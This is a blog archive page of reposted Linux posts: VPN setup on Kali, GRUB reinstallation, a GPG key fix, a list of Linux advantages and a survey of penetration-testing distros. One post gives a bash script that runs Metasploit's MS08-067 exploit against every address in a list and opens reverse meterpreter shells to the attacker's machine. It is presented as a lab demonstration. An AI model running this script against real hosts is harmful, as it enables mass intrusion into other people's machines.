Archive | linux

How To: Configure VPN in Kali Linux

A virtual private network (VPN) extends a private network across a public network, such as the Internet. It enables a computer to send and receive data across shared or public networks as if it were directly connected to the private network, while benefiting from the functionality, security and management policies of the private network. A VPN is created by establishing a virtual point-to-point connection through the use of dedicated connections, virtual tunneling protocols, or traffic encryption. On Kali Linux, the VPN options are grayed out by default. This guide shows how to install the packages needed to fix the grayed-out VPN options and enable VPN on Kali Linux.

A virtual private network connection across the Internet is similar to a wide area network (WAN) link between sites. From a user perspective, the extended network resources are accessed in the same way as resources available within the private network. Through a VPN you can access your private network over the Internet.
VPNs allow employees to securely access their company’s intranet while traveling outside the office. Similarly, VPNs securely connect geographically disparate offices of an organization, creating one cohesive network. VPN technology is also used by Internet users to connect to proxy servers for the purpose of protecting personal identity and location. [Source: Wikipedia]

Why use VPN – benefits?

Here are my top 11 reasons why you would want to use VPN services.
  1. VPN provides privacy and cloaks your IP address.
  2. Use any network (public or private or free WiFi) with encryption.
  3. Log in to your home or work network from anywhere with confidence.
  4. Bypass censorship and content monitoring.
  5. Browse and bypass firewall and censorship policy at work or anywhere!
  6. Access region-restricted services from anywhere (e.g. YouTube videos, Netflix or BBC Player etc.)
  7. Transfer or receive files with privacy.
  8. Hide your voice/VoIP calls.
  9. Use search engines while hiding some of your identity.
  10. Hide yourself.
  11. Because you like to be anonymous.
As you can see from the list above, a VPN does not necessarily hide everything. Search engines can probably still recognize you based on your cookies, previous browsing behavior, account sign-in (duh!), and browser plug-ins (e.g. Alexa, Google Toolbar etc.).


linux

from iExplo1t http://ift.tt/1lwWOEz

How To Uninstall Linux from a Dual-Boot Windows using EasyBCD

OK, so, you’ve tried a Linux distro for netbooks (like Ubuntu) and you’ve decided, “Hey, I don’t like this.” I’ve been there, too.
But now, whenever you boot, you get an annoying GRUB menu asking you to select what OS you want to boot into, and you have to scramble to switch to Windows. Plus, you’ve got a swath of disk space you can’t use anymore because the Linux distro you don’t want any more is using it. Most people would advise using EasyBCD.
http://ift.tt/1ACEzYf


linux, Windows

from iExplo1t http://ift.tt/1ACEC69

Kali Linux – Complete Re-install of GRUB from Live (CD/USB)



Hi all
This video tutorial will show you how you can use a Kali Live CD / USB drive to reinstall GRUB, even when your boot device is inaccessible (sometimes damaged by Windows installations or other OSes).
You have to know your Kali partition (find it with GParted or fdisk -l) and mount it.

Commands used in this video:

Mount the Linux partition on /mnt:

mount /dev/sda1 /mnt

Use the partition holding the Linux installation on your hard drive instead of /dev/sda1.

Bind-mount the live CD's system directories into the installed Linux directory:

mount --bind /dev /mnt/dev
mount --bind /proc /mnt/proc
mount --bind /sys /mnt/sys

Get root privileges inside the installed system:

chroot /mnt

Install GRUB:

grub (press TAB twice to list the available GRUB commands)
grub-install /dev/sda

Use your boot device instead of /dev/sda.

Update the GRUB configuration:

grub-mkconfig -o /boot/grub/grub.cfg

Leave the chroot and unmount everything:

CTRL-D
umount /mnt/dev
umount /mnt/proc
umount /mnt/sys
umount /mnt

reboot





linux, Kali Linux

from iExplo1t http://ift.tt/1pBEN9g

20 Things that you can do with Linux but not with Mac or Windows

Someone asked me this recently. I don’t have just one answer. I compiled a list of things I thought of and emailed it to my friend…then I thought I would post it here for future reference. Feel free to add to the list! There is also a forums thread on the same topic, that I remembered as I compiled my thoughts, so I stole some of the ideas posted there.
1. Upgrade to the newest version legally and without paying money
2. Have the latest version of the operating system run faster than the previous version on the same hardware
3. Easily install and run different graphical interfaces if I don’t like the default setup
4. Install twenty programs with one command
5. Have the system automatically update all my installed programs for me.

6. Install the same copy of my OS (Ubuntu) on multiple computers without worrying about license restrictions or activation keys
7. Give away copies of the operating system and other programs that run on it without breaking any laws, governmental or ethical or moral, because it was all intended to be used this way
8. Have full control over my computer hardware and know that there are no secret back doors in my software, put there by malicious software companies or governments
9. Run without using a virus scanner, adware/spyware protection, and not reboot my computer for months, even when I do keep up with all of the latest security updates

10. Run my computer without needing to defragment my hard drive, ever
11. Try out software, decide I don’t like it, uninstall it, and know that it didn’t leave little bits of stuff in a registry that can build up and slow down my machine
12. Make a major mistake that requires a complete reinstallation and be able to do it in less than an hour, because I put all of my data on a separate partition from the operating system and program files

13. Boot into a desktop with flash and effects as cool as Windows Vista on a three year old computer…in less than 40 seconds, including the time it takes me to type my username and password to login
14. Customize anything I want, legally, including my favorite programs. I can even track down the software developers to ask them questions, contribute ideas, and get involved in the actual design/software writing process if I want to
15. Have 4+ word processor windows open working on papers, listen to music, play with flashy desktop effects, have contact with a largely happy community and have firefox, instant messaging, and email clients all open at the same time, without ever having had to beg someone for a code to make my os work, and without the system running so slow it is useless

16. Use the command "dpkg --get-selections > pkg.list" to make a full, detailed list of all software I have installed, back up my /etc and /home directories on a separate partition, and be able to recover my system any time, easily
17. Run multiple desktops simultaneously, or even allow multiple users to log in and use the computer simultaneously
18. Resize a hard disk partition without having to delete it and without losing the data on it
19. Use the same hardware for more than 5 years before it really needs to be replaced…I have some hardware that is nearly 10 years old, running Linux, and still useful
20. Browse the web while the OS is being installed!
21. Use almost any hardware and have a driver for it included with the operating system…eliminating the need to scour the internet to find the hardware manufacturer’s website to locate one
22. Get the source code for almost anything, including the OS kernel and most of my applications


linux

from iExplo1t http://ift.tt/1xx8PB3

ArtistX – The Linux Distro for Artists

ArtistX is a fantastic Ubuntu-based Linux distro developed by Marco Ghirlanda in Milan, Italy. It features a wide range of free 2D/3D graphic, audio, and video editing software that can be installed or accessed via live-USB booting, to make any machine into a fully equipped production suite.
The range of software included in ArtistX is quite impressive. It includes Blender for 3D modelling, Gimp for 2D image alteration, Animata for cartoon animation, and Cinepaint for video editing. A full list can be found on the ArtistX website.

I’ve been using this distro for a while now and I have to say my impressions are very good. It runs well with very little lag on my low end netbook. The design is simple and nice. But most of all the provided arsenal of software gives you everything you could possibly want, to work on almost any sort of project whether it be film, animation, or writing.
If you’re on a tight budget and looking for a great OS designed for creative individuals that maintains a Linux environment, ArtistX is definitely for you.


linux, articles

from iExplo1t http://ift.tt/1jfuDsM

Hack Multiple Systems with MSFCLI and Bash Scripting

In this video, I will demonstrate how to simultaneously exploit multiple machines with a common vulnerability using MSFCLI (Metasploit Framework Command Line Interface) and bash scripting. I will perform this demonstration by exploiting three Windows machines simultaneously and acquiring a reverse TCP meterpreter shell on each system.




Commands:

#!/bin/bash

i=4444
for ip in $(cat iplist.txt)
do
gnome-terminal -x msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=$ip LHOST=192.168.1.8 LPORT=$i E
echo "Exploiting $ip and establishing reverse connection on local port $i"
i=$(($i+1))
done


linux, BackBox, Kali Linux, BackTrack

from iExplo1t http://ift.tt/1onDPCL

How To: Fix the GPG error in updater “NO_PUBKEY”

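For those who have this problem (NO_PUBKEY), run the following, replacing THEKEY with the key ID shown in the NO_PUBKEY error message:

root@kali:~# gpg --keyserver pgp.mit.edu --recv-keys THEKEY
root@kali:~# gpg --armor --export THEKEY | apt-key add -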


linux, BackBox, Kali Linux, BackTrack, Ubuntu

from iExplo1t http://ift.tt/1odghMF

How To Install Kali Tools in Linux Mint (Works for all versions!)

THIS IS NOT 100% PERFECT. You will get some errors because it is a different distro version, but it will generally work fine. It will take quite a while to download and install all the apps (1.8-2.3 GB), depending on system and internet speed!

http://ift.tt/SlZCg3
http://ift.tt/1t8L5kI
http://ift.tt/1t8L2oY
http://ift.tt/1jezpKb


Linux Mint, linux, BackBox, Kali Linux, BackTrack

from iExplo1t http://ift.tt/1jezq0y

How To: Install Flareget in Kali Linux (Best Download Manager)

http://flareget.com/
Hello Dragons. As you may know, FlareGet is an open source, multi-threaded, multi-segment popular download manager and accelerator, working on Linux (like uGet or XDMAN). The latest version available is FlareGet, which comes with new browser integration extensions and direct download support for file sharing sites.
For more information, see the official changelog.


linux, BackBox, Kali Linux, BackTrack

from iExplo1t http://ift.tt/1oAxS4l

TOP 13 PENETRATION TESTING LINUX DISTRIBUTIONS

[Source: concise-courses.com]

OK, none of the following pentesting distributions were in the top 100 list over at Distro Watch but we don’t care – we are talking about penetration testing tools – or specifically the creation of distros that have all the necessary open source tools that help ethical hackers and penetration testers do their job. Like everything else when it comes to choices, every pentesting distro has its own pros, cons and specialty. Some distros, for example, are better at web application vulnerability discovery, forensics, WiFi cracking, reverse engineering, malware analysis, social engineering etc.

1. Kali Linux

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.
Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), and Aircrack-ng (a software suite for penetration-testing wireless LANs). Kali Linux can be run from a hard disk, live CD, or live USB. It is a supported platform of the Metasploit Project’s Metasploit Framework, a tool for developing and executing security exploits.
Kali Linux is distributed in 32- and 64-bit images for use on hosts based on the x86 instruction set, and as an image for the ARM architecture for use on the Raspberry Pi computer and on Samsung’s ARM Chromebook.

2. BackTrack 5R3

The mamma or best known of Linux pentesting distros. BackTrack has a very cool strapline: “The quieter you become, the more you are able to hear.” That just sounds cool….

BackTrack is based on the ever-popular Ubuntu. The pentesting distro used to be only available within a KDE environment but GNOME was added as an option with the release of BackTrack v5. For those working in Information Security or intrusion detection, BackTrack is one of the most popular pentesting distros that can run on a live CD or flash drive. The distribution is ideal for wireless cracking, exploiting, web application assessment, learning, or social-engineering a client.
Here is a list of some of the awesome tools available in BackTrack 5r3 (the latest release).

To identify live hosts:
  dnmap – Distributed NMap
  address6 – IPv6 address conversion

Information Gathering Analysis (Social Engineering):
  Jigsaw – Grabs information about company employees
  Uberharvest – Email harvester
  sslcaudit – SSL cert audit
  VoIP honey – VoIP honeypot
  urlcrazy – Detects URL typos used in typo squatting, URL hijacking, phishing

Web Crawlers:
  Apache_users – Apache username enumerator
  Deblaze – Performs enumeration and interrogation against Flash remote end points

Database Analysis:
  Tnscmd10g – Allows you to inject commands into Oracle
  BBQSQL – Blind SQL injection toolkit

Bluetooth Analysis:
  Blueranger – Uses link quality to locate Bluetooth devices

Vulnerability Assessment:
  Lynis – Scans systems & software for security issues
  DotDotPwn – Directory traversal fuzzer

Exploitation Tools:
  Netgear-telnetable – Enables Telnet console on Netgear devices
  Terminator – Smart meter tester
  Htexploit – Tool to bypass standard directory protection
  Jboss-Autopwn – Deploys JSP shell on target JBoss servers
  Websploit – Scans & analyses remote systems for vulnerabilities

Wireless Exploitation Tools:
  Bluepot – Bluetooth honeypot
  Spooftooph – Spoofs or clones Bluetooth devices
  Smartphone-Pentest-Framework
  Fern-Wifi-cracker – GUI for testing wireless encryption strength
  Wi-fihoney – Creates fake APs using all encryption and monitors with Airodump
  Wifite – Automated wireless auditor

Password Tools:
  Creddump
  Johnny
  Manglefizz
  Ophcrack
  Phrasendresher
  Rainbowcrack
  Acccheck
  smbexec

3. NodeZero.

Like BackTrack, NodeZero is an Ubuntu based distro used for penetration testing using repositories so every time Ubuntu releases a patch for its bugs, you also are notified for system updates or upgrades. Node Zero used to be famous for its inclusion of THC IPV6 Attack Toolkit which includes tools like alive6, detect-new-ip6, dnsdict6, etc, but I think that these days BackTrack 5r3 also includes these tools.

Whereas BackTrack is touted as being a “run-everywhere” distro, i.e. running it live, NodeZero Linux (which can also be run live) states that the distro’s real strength comes from a hard install. NodeZero, in their own words, believe that a penetration tester “requires a strong and efficient system [achieved by using] a distribution that is a permanent installation, that benefits from a strong selection of tools, integrated with a stable Linux environment.” Sounds cool. Ever tried it? Let us know in the comments below.

4. BackBox Linux

BackBox is getting more popular by the day. Like BackTrack and NodeZero, BackBox Linux is an Ubuntu-based distribution developed to perform penetration tests and security assessments. The developers state that the intention with BackBox is to create a pentesting distro that is fast and easy to use. BackBox does have a pretty concise looking desktop environment and seems to work very well. Like the other distros BackBox is always updated to the latest stable versions of the most often used and best-known ethical hacking tools through repositories.

BackBox has all the usual suspects for Forensic Analysis, Documentation & Reporting and Reverse Engineering with tools like ettercap, john, metasploit, nmap, Social Engineering Toolkit, sleuthkit, w3af, wireshark, etc.

5. Blackbuntu.

Yes, as the name clearly suggests, this is yet another distro that is based on Ubuntu. Here is a list of Security and Penetration Testing tools – or rather categories available within the Blackbuntu package, (each category has many sub categories) but this gives you a general idea of what comes with this pentesting distro: Information Gathering, Network Mapping, Vulnerability Identification, Penetration, Privilege Escalation, Maintaining Access, Radio Network Analysis, VoIP Analysis, Digital Forensic, Reverse Engineering and a Miscellaneous section. This list is hardly revolutionary but the tools contained within might be different to the other distros.


6. Samurai Web Testing Framework.

This is a live Linux distro that has been pre-configured with some of the best open source and free tools that focus on testing and attacking websites. The difference with Samurai Web Testing Framework is that it focuses on attacking (and therefore being able to defend) websites. The developers outline four steps of a web pen-test. These steps are incorporated within the distro, which contains the necessary tools to complete each task.
Step 1: Reconnaissance – Tools include Fierce domain scanner and Maltego.
Step 2: Mapping – Tools include WebScarab and ratproxy.
Step 3: Discovery – Tools include w3af and burp.
Step 4: Exploitation – Tools include BeEF, AJAXShell and much more.

Of interest as well, the Live CD also includes a pre-configured wiki, set up to be a central information store during your pen-test.
The Samurai Web Testing Framework is a live Linux distro that focuses on web application vulnerability research and web pentesting within a “safe environment” – i.e. so you can ethically hack without violating any laws. This is a pentesting distro recommended for penetration testers who want to combine network and web app techniques.

7. Knoppix STD.

This distro is based on Debian and originated in Germany. The architecture is i486 and runs from the following desktops: GNOME, KDE, LXDE and also Openbox. Knoppix has been around for a long time now – in fact I think it was one of the original live distros.

Although Knoppix is primarily designed to be used as a Live CD, it can also be installed on a hard disk. The STD in the Knoppix name stands for Security Tools Distribution. The Cryptography section is particularly well-known in Knoppix.

8. Pentoo.

Pentoo is a security-focused live CD based on Gentoo. In their own words “Pentoo is Gentoo with the pentoo overlay.” So, if you are into Pentoo then this is the distro for you. Their homepage lists some of their customized tools and kernel, including: a Hardened Kernel with aufs patches, Backported Wifi stack from latest stable kernel release, Module loading support ala slax, XFCE4 wm and Cuda/OPENCL cracking support with development tools.


9. WEAKERTH4N.

This penetration distribution is built from Debian Squeeze and uses Fluxbox for its desktop environment. This pentesting distro is particularly well adjusted for WiFi hacking since it contains many wireless tools. Here is a quick summary of WEAKERTH4N’s tool categories: Wifi attacks, SQL Hacking, Cisco Exploitation, Password Cracking, Web Hacking, Bluetooth, VoIP Hacking, Social Engineering, Information Gathering, Fuzzing, Android Hacking, Networking and Shells.


10. Matriux Krypton.

This Linux distro is, I believe, the first security distribution based directly on Debian (after WEAKERTH4N?). If I am wrong please comment below! There are 300 security tools to work with, called “arsenals”. The arsenals allow for penetration testing, ethical hacking, system and network administration, security testing, vulnerability analysis, cyber forensics investigations, exploiting, cracking and data recovery. The last category, data recovery, doesn’t seem to be prevalent in the other distros.


11. DEFT.

The latest version is DEFT 7 which is based on the new Linux Kernel 3 and the DART (Digital Advanced Response Toolkit). This distro is more orientated towards Computer Forensics and uses LXDE as desktop environment and WINE for executing Windows tools under Linux. The developers (based in Italy) hope that their distro will be used by the Military, Police, Investigators, IT Auditors and professional penetration testers. DEFT is an abbreviation for “Digital Evidence & Forensic Toolkit”.


12. CAINE

A reader of our blog suggested adding CAINE, which we duly have. CAINE stands for Computer Aided Investigative Environment and, like many information security products and tools, it is an Italian GNU/Linux live distribution. CAINE offers a comprehensive forensic environment that is organized to integrate existing software tools that are composed as software modules, all displayed within a friendly graphical interface. CAINE states that it has three objectives: first, to ensure that the distro works in an interoperable environment that supports the digital investigator during the four phases of the digital investigation; second, that the distro has a user-friendly graphical interface; and finally, that it provides a semi-automated compilation of the final forensic report. As you would likely expect, CAINE is fully open-source.

If anyone has used this please let us know.

13. Bugtraq

Bugtraq is another reader-submitted pentesting distro. Based on the 2.6.38 kernel, this distro offers a really wide range of penetration and forensic tools. Like most of the others in this list, Bugtraq can be hard-installed or, obviously, run as a Live DVD or from a USB drive. Bugtraq claims to have recently configured and updated the kernel for better performance but also, importantly, so that it can recognize more hardware, including wireless injection patches for pentesting. The team at Bugtraq seem solid because they are clearly making an effort to get the kernel to work with more hardware – something on which the other distributions don’t always place enough importance.

Some of the special features included with Bugtraq include (as stated) an expanded range of recognition for injection wireless drivers, (i.e. not just the usual Alfa rtl8187), a patched 2.6.38 kernel and solid installation of the usual suspects: Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira etc.
Unique to Bugtraq (as claimed on their site) is the ability to, or better said, ease, of deleting tracks and backdoors. Just by having read about Bugtraq I’m really glad that I can add this to the list because it just sounds like a job well done. If you are interested in any of the following pentesting and forensic categories, then do go and check out Bugtraq: Malware, Penetration Shield, Web audit, Brute force attack, Communication and Forensics Analytics, Sniffers, Virtualizations, Anonymity and Tracking, Mapping and Vulnerability detection.
Quick Summary: You can’t go wrong with any Ubuntu-based distro. BackTrack does the job well but I guess, of course, it’s all personal – i.e. does the distro do the job for you? Every penetration tester leans towards a particular tool or tool-set. Frankly they are all good, and it would be prudent to use several of these pentesting distros as live versions. For WiFi hacking, WEAKERTH4N is likely your better friend, whilst to stay within the law, use Samurai.
Bugtraq looks really good – the team behind it seems to have taken considerable time to tick all the boxes. Once we test it I’ll update the post.
Here is a list of other distros (which we think are still alive and kicking – please correct us if we are wrong).


linux, BackBox, Kali Linux, BackTrack, articles, Ubuntu

from iExplo1t http://ift.tt/1nBMY72